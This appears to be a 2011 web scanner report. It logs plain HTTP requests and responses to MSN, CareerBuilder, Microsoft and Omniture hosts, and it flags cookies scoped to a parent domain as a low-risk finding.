GET /en-us/library/cc838158(VS.95 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAAC+BgAA/LKUz1RDYrDrBIShzmD0CQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:20 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/cc838158(VS.95).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29998 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: A=I&I=AxUFAAAAAAAvCAAAAHhoQDRGOCpGUJGGvUjPzg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: TocHashCookie=ms310241(n)/aa139615(n)/cc838813(VS.95,n)/; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Set-Cookie: A=I&I=AxUFAAAAAAC5BwAAZhvvn/BBIrR1Pt6imQlAcw!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:15 GMT; path=/; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/ff637515(VS.92 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14228 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAACxBwAAsl7l0ihNIHEg4m248bhSNg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:22 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/ff637515(VS.92).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21669 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: A=I&I=AxUFAAAAAACeBwAAfX4UyXJKIqHwEP+0sulhJA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: TocHashCookie=ms310241(n)/aa187916(n)/ff403849(VS.92,n)/na/; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Set-Cookie: A=I&I=AxUFAAAAAACPCQAACkbcHwtHFnbPetyIMGIFSQ!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:26:22 GMT; path=/; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: msn.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 0 Location: http://msn.careerbuilder.com/msn/default.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=3f30430db87e4e269a85cb0eeebc1aac-349650951-x6-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1974D75CFDC14C842D559454AB8AE26C0EE1866FEBFDE6D9E24188B0257E60F8847335758E3A1239E4168099294A9A3E8; domain=.careerbuilder.com; expires=Mon, 30-Jan-2012 02:15:51 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEARWEBTEST1 Date: Sun, 30 Jan 2011 02:15:51 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/ HTTP/1.1 Host: msn.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 58233 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=217c15685a7947bc834d222ac5644fdb-349642135-XJ-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1974D75CFDC14C842A95BF216FF78EBA0B15DE7242A948C767593FFCBD9946DC3EE96BBC153A559E56DD81A338B99D40F; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEARWEB50 Date: Sat, 29 Jan 2011 23:48:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> MSN Ca ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/ HTTP/1.1 Host: msn.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60802 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=1376ce83848c458bad9f9645f4c3cfa3-349642136-XH-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1974D75CFDC14C842F532F2B54CCD51E8D85817405B60EDB414DD584DBAE145C363A33CFCCCD28ABE3843C2AB1513C2FD; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEARWEB48 Date: Sat, 29 Jan 2011 23:48:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> MSN Ca ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/ HTTP/1.1 Host: msn.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61729 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=395818babba7496ca7f1ec46d56b6afc-349642127-XB-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1974D75CFDC14C8425FF500443C942BAF241B9E407CBF4C42B5FD4C39911286DBFFBA30E2FAA02C46E8E850F0AD333FE8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR42 Date: Sat, 29 Jan 2011 23:48:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> MSN Ca ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/ HTTP/1.1 Host: msn.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60120 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=3eb01fb472e34dfbb522cdac313c9679-349642137-w6-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1974D75CFDC14C84271DBE1DDB3CC2075D4566E934132B9FE8F5A3AD8D64E2A0E08564952FD43F1D0830940A7662B16DF; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR6 Date: Sat, 29 Jan 2011 23:48:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> MSN Ca ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /jobseeker/jobs/jobResults.aspx HTTP/1.1 Host: msn.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 186049 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=fce2ee8d67554dafa8996a80449bf770-349642143-XI-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1974D75CFDC14C842AF27C9499CC36681A09DA126FC89CDE67D6CB317A39CA4DEA45CDDE40FA597B269AF1D1F84882078; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:02 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEARWEB49 Date: Sat, 29 Jan 2011 23:49:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Job Se ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /msn/default.aspx HTTP/1.1 Host: msn.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67783 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=a1015ecbf19144f8ae5b365846c3aa34-349642122-XC-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X1974D75CFDC14C842F6D25E611765960B75D9DDF2256A2305A68D4A4064297C578D46EDCBE5C2F36EC73EE09F4CCCAF3E; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:42 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR43 Date: Sat, 29 Jan 2011 23:48:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Jobs & ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845 HTTP/1.1 Host: msnbc.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:03 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/ Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 01:22:03 GMT Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www383 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724 HTTP/1.1 Host: msnbc.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:16:21 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/ Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 02:16:21 GMT Last-Modified: Mon, 31 Jan 2011 02:16:21 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www391 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812 HTTP/1.1 Host: msnbc.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:03 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/ Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 01:22:03 GMT Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www598 Content-Length: 0 Content-Type: text/plain Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ppsecure/post.srf HTTP/1.1 Host: msnia.login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:14:43 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: TK2IDSMLGN1C04 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:13:43 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1 X-Frame-Options: deny Content-Length: 11551
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnportalhome/1/H.7-pdv-2/{0} HTTP/1.1 Host: msnportal.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 29 Jan 2011 23:50:09 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/ Location: http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Fri, 28 Jan 2011 23:50:09 GMT Last-Modified: Sun, 30 Jan 2011 23:50:09 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www70 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/msnportalusenmoney/1/H.7-pdv-2/{0} HTTP/1.1 Host: msnportal.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|2693B20C05013B68-4000010D20126E16|dinydefxxelh|2696E365851591F8-40000180E0024F83[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:16:45 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/ Location: http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 02:16:45 GMT Last-Modified: Mon, 31 Jan 2011 02:16:45 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www52 Content-Length: 0 Content-Type: text/plain Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: music.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 96630 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=d50ddeb179d249659073f8d313a6170a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:50:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: my.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: my.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
